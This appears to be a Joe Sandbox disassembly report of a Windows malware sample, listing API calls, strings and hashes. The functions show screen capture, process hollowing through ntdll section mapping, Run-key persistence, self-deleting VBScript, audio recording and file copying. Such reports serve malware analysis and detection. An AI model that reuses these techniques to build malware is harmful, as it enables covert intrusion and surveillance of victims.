                                                                                          • Opcode Fuzzy Hash: cd62537e8c3e003b13522b9155b4eea68fe7d0001d8d421cd242523031e004a2
                                                                                          • Instruction Fuzzy Hash: 0211553A2007019FDB189F39C9916BBBB92FF8075AB14482EEE4687B41D7B5A946C740
                                                                                          APIs
                                                                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$InfoLocale_abort_free
                                                                                          • String ID:
                                                                                          • API String ID: 2692324296-0
                                                                                          • Opcode ID: ed905f4e10f5b376defebc36d7d97aa2bb2c1abe5f1ea1ee61b46868c197e3f5
                                                                                          • Instruction ID: 8c29d710edde3bbc403447a64c1727e90569dbd09ff88c71ffccea9529c81983
                                                                                          • Opcode Fuzzy Hash: ed905f4e10f5b376defebc36d7d97aa2bb2c1abe5f1ea1ee61b46868c197e3f5
                                                                                          • Instruction Fuzzy Hash: C4F04936A00116BBDB245A24D905BBF7B58EB01315F04446BEC05A3241FAF8FD058694
                                                                                          APIs
                                                                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                          • EnumSystemLocalesW.KERNEL32(00452393,00000001), ref: 00452102
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                          • String ID:
                                                                                          • API String ID: 1084509184-0
                                                                                          • Opcode ID: b47e8d7704c3cea33439bb1b9c4b2a0344765dc89a2caae7295f0002ba586764
                                                                                          • Instruction ID: 883a99871793c155097d9da94a803295819168bd30f8f35cc04eca091e96b9f4
                                                                                          • Opcode Fuzzy Hash: b47e8d7704c3cea33439bb1b9c4b2a0344765dc89a2caae7295f0002ba586764
                                                                                          • Instruction Fuzzy Hash: E8F0FF363007056FDB245F399881A6B7B96FB82769B04482EFE458B682DAB99C42D604
                                                                                          APIs
                                                                                            • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(-0006D41D,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                                                                          • EnumSystemLocalesW.KERNEL32(Function_0004843E,00000001,0046EAE0,0000000C), ref: 004484BC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                          • String ID:
                                                                                          • API String ID: 1272433827-0
                                                                                          • Opcode ID: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                                                          • Instruction ID: 901ea181f65c0ebd25502bb0be635eecd519ab6688482fb1bf3a60b9f01fb263
                                                                                          • Opcode Fuzzy Hash: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                                                          • Instruction Fuzzy Hash: 37F04F76A50200EFEB00EF69D946B4D37E0FB04725F10446EF514DB2A2DB7899809B49
                                                                                          APIs
                                                                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                          • EnumSystemLocalesW.KERNEL32(00451F27,00000001), ref: 00452007
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                          • String ID:
                                                                                          • API String ID: 1084509184-0
                                                                                          • Opcode ID: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                                                          • Instruction ID: 16a122e2f6617649f53ffd93528404cf76eb0d70ff9257d35f530b0535ef024d
                                                                                          • Opcode Fuzzy Hash: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                                                          • Instruction Fuzzy Hash: 84F0203630020597CB04AF75D845B6A7F90EB82729B06009AFE058B6A2C7799842C754
                                                                                          APIs
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_00034BE4,0043490B), ref: 00434BDD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                          • String ID:
                                                                                          • API String ID: 3192549508-0
                                                                                          • Opcode ID: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                                                          • Instruction ID: 702e07acd891e046c8aea5fc6397425f5e3bd38ef0af78e1c7fed93ac6412050
                                                                                          • Opcode Fuzzy Hash: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                                                          • Instruction Fuzzy Hash:
                                                                                          APIs
                                                                                          • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                                                                                            • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                                                                                          • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                                                                                          • DeleteDC.GDI32(00000000), ref: 00418F65
                                                                                          • DeleteDC.GDI32(00000000), ref: 00418F68
                                                                                          • DeleteObject.GDI32(00000000), ref: 00418F6B
                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                                                                                          • DeleteDC.GDI32(00000000), ref: 00418F9D
                                                                                          • DeleteDC.GDI32(00000000), ref: 00418FA0
                                                                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                                                                                          • GetCursorInfo.USER32(?), ref: 00418FE2
                                                                                          • GetIconInfo.USER32(?,?), ref: 00418FF8
                                                                                          • DeleteObject.GDI32(?), ref: 00419027
                                                                                          • DeleteObject.GDI32(?), ref: 00419034
                                                                                          • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                                                                                          • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
                                                                                          • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                                                                                          • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                                                                          • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                                                                          • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                                                                          • DeleteDC.GDI32(?), ref: 004191B7
                                                                                          • DeleteDC.GDI32(00000000), ref: 004191BA
                                                                                          • DeleteObject.GDI32(00000000), ref: 004191BD
                                                                                          • GlobalFree.KERNEL32(?), ref: 004191C8
                                                                                          • DeleteObject.GDI32(00000000), ref: 0041927C
                                                                                          • GlobalFree.KERNEL32(?), ref: 00419283
                                                                                          • DeleteDC.GDI32(?), ref: 00419293
                                                                                          • DeleteDC.GDI32(00000000), ref: 0041929E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                                                                                          • String ID: DISPLAY
                                                                                          • API String ID: 4256916514-865373369
                                                                                          • Opcode ID: 5aa8ba5f4fa3625dde88f89095c127eaec24427bf1a19f92978ea0438fce6c5f
                                                                                          • Instruction ID: e1b8f987aa81746083de8242de432fb1856ba331ec6d7e725e66c1191a76d441
                                                                                          • Opcode Fuzzy Hash: 5aa8ba5f4fa3625dde88f89095c127eaec24427bf1a19f92978ea0438fce6c5f
                                                                                          • Instruction Fuzzy Hash: 64C14C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A
                                                                                          APIs
                                                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                                                          • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                                                          • GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                                                                          • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004182A6
                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418328
                                                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                                                                                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                                                                          • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00418446
                                                                                          • SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                                                                          • ResumeThread.KERNEL32(?), ref: 00418470
                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                                                                          • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                                                                          • GetLastError.KERNEL32 ref: 004184B5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                                          • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                          • API String ID: 4188446516-3035715614
                                                                                          • Opcode ID: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                                                                          • Instruction ID: d7ba82c79e3f17b97bd8f2c1aaed993f07984c16d96ff77cb9dc1491e823fc6f
                                                                                          • Opcode Fuzzy Hash: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                                                                          • Instruction Fuzzy Hash: 69A15FB0604305AFDB209F64DD85B6B7BE8FF48705F00482EF685D6291EB78D844CB59
                                                                                          APIs
                                                                                            • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                            • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                                                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                                                                            • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                                            • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                                                                            • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                            • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                                                                          • ExitProcess.KERNEL32 ref: 0040D80B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                          • String ID: """, 0$")$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                          • API String ID: 1861856835-2731992618
                                                                                          • Opcode ID: d8e98d1fd2f1bdc760dae9a559abea4cd274c949fa03be3778951f2c3f1c4be1
                                                                                          • Instruction ID: 9f807323933333198641953f201c1fc8368d74e19fdabe041c5449f7db564f80
                                                                                          • Opcode Fuzzy Hash: d8e98d1fd2f1bdc760dae9a559abea4cd274c949fa03be3778951f2c3f1c4be1
                                                                                          • Instruction Fuzzy Hash: 8791B0716082005AC315FB62D8529AF77A8AFD4309F10443FB64AA71E3EF7C9D49C65E
APIs
• mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
• mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
• PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B21F
• mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
• mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
• mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
• SetEvent.KERNEL32 ref: 0041B2AA
• WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
• CloseHandle.KERNEL32 ref: 0041B2CB
• mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
• mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
Strings
Memory Dump Source
• Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
Yara matches
Similarity
• API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
• String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
• API String ID: 738084811-2094122233
• Opcode ID: e27b3f9eba018f8ca3c324594b7161069c0f951711efb11517c4a8cfdc535e62
• Instruction ID: 904a2ea9ee052b7cd0d2885f28b370526ea16529c5f4723dacad6ab52bd59ce6
• Opcode Fuzzy Hash: e27b3f9eba018f8ca3c324594b7161069c0f951711efb11517c4a8cfdc535e62
• Instruction Fuzzy Hash: 015193B12842056ED314B731DC96ABF779CDB80359F10053FB246621E2EF789D498AAE
APIs
  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
  • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
• GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E0
• RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
• SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D223
• SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D232
  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
  • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
  • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
• ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
• ExitProcess.KERNEL32 ref: 0040D454
Strings
Memory Dump Source
• Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
Yara matches
Similarity
• API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
• String ID: ")$.vbs$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("$xpF
• API String ID: 3797177996-2101481668
• Opcode ID: 54b64125b67377fc7bd1dcd8851340f67987214f4c55140a652dce6bd793e06d
• Instruction ID: f7f00373e35faeae073ffedb9d5543756e5675edee5c5b567d0d61755fae189b
• Opcode Fuzzy Hash: 54b64125b67377fc7bd1dcd8851340f67987214f4c55140a652dce6bd793e06d
• Instruction Fuzzy Hash: 6181AF716082405AC315FB62D8529AF77A8AFD0308F10483FB58A671E3EF7C9E49C65E
APIs
• CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 004124CF
• ExitProcess.KERNEL32(00000000), ref: 004124DB
• CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
• OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
• CloseHandle.KERNEL32(00000000), ref: 00412576
• GetCurrentProcessId.KERNEL32 ref: 0041257C
• PathFileExistsW.SHLWAPI(?), ref: 004125AD
• GetTempPathW.KERNEL32(00000104,?), ref: 00412610
• GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
• lstrcatW.KERNEL32(?,.exe), ref: 0041263C
  • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
• ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
• Sleep.KERNEL32(000001F4), ref: 004126BD
• OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
• CloseHandle.KERNEL32(00000000), ref: 004126E4
• GetCurrentProcessId.KERNEL32 ref: 004126EA
Strings
Memory Dump Source
• Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
Yara matches
Similarity
• API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
• String ID: .exe$WDH$exepath$open$temp_
• API String ID: 2649220323-3088914985
• Opcode ID: 1b3fed83da2aab5ae681b9012af93f6771012d14136d86493a6b51ff35766dc4
• Instruction ID: ea0e71dbd1735df2f0ffa6a76a18ae54bfb239dee3d1740714ca762960b89f4c
• Opcode Fuzzy Hash: 1b3fed83da2aab5ae681b9012af93f6771012d14136d86493a6b51ff35766dc4
• Instruction Fuzzy Hash: 4C51C871A00215BBDB10ABA09C99EFE336D9B04715F1041ABF501E71D2EF7C8E858A5D
APIs
• CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
• WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
• WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
• WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
• WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
• WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
• WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
• WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
• WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
• WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
• WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
• WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
• WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
• WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
Strings
Memory Dump Source
• Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
Yara matches
Similarity
• API ID: File$Write$Create
• String ID: RIFF$WAVE$data$fmt
• API String ID: 1602526932-4212202414
• Opcode ID: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
• Instruction ID: e437df56db769974f3bb03b9acf3047b6271bea3308615ff466a61b001f8e6b8
• Opcode Fuzzy Hash: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
• Instruction Fuzzy Hash: D1413F72644218BAE210DB51DD85FBB7FECEB89B50F40441AFA44D60C0E7A5E909DBB3
APIs
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe,00000001,00407688,C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe,00000003,004076B0,004752D8,00407709), ref: 004072BF
• GetProcAddress.KERNEL32(00000000), ref: 004072C8
• GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
• GetProcAddress.KERNEL32(00000000), ref: 004072E0
• GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
• GetProcAddress.KERNEL32(00000000), ref: 004072F4
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
• GetProcAddress.KERNEL32(00000000), ref: 00407308
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
• GetProcAddress.KERNEL32(00000000), ref: 0040731C
• GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
• GetProcAddress.KERNEL32(00000000), ref: 00407330
Strings
Memory Dump Source
• Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProc
• String ID: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
• API String ID: 1646373207-4025155079
• Opcode ID: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
• Instruction ID: 405170eedd050388d8f538cead316ce70cca9a1d875d15a5a69166cce564cbe9
• Opcode Fuzzy Hash: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
• Instruction Fuzzy Hash: 0A0152A0E4431676D711AF7AAC44D577E9D9E41351311487BB405E2292EEBCE800CD6E
APIs
• _wcslen.LIBCMT ref: 0040CE42
• CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
• CopyFileW.KERNEL32(C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CF0B
• _wcslen.LIBCMT ref: 0040CF21
• CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
• CopyFileW.KERNEL32(C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe,00000000,00000000), ref: 0040CFBF
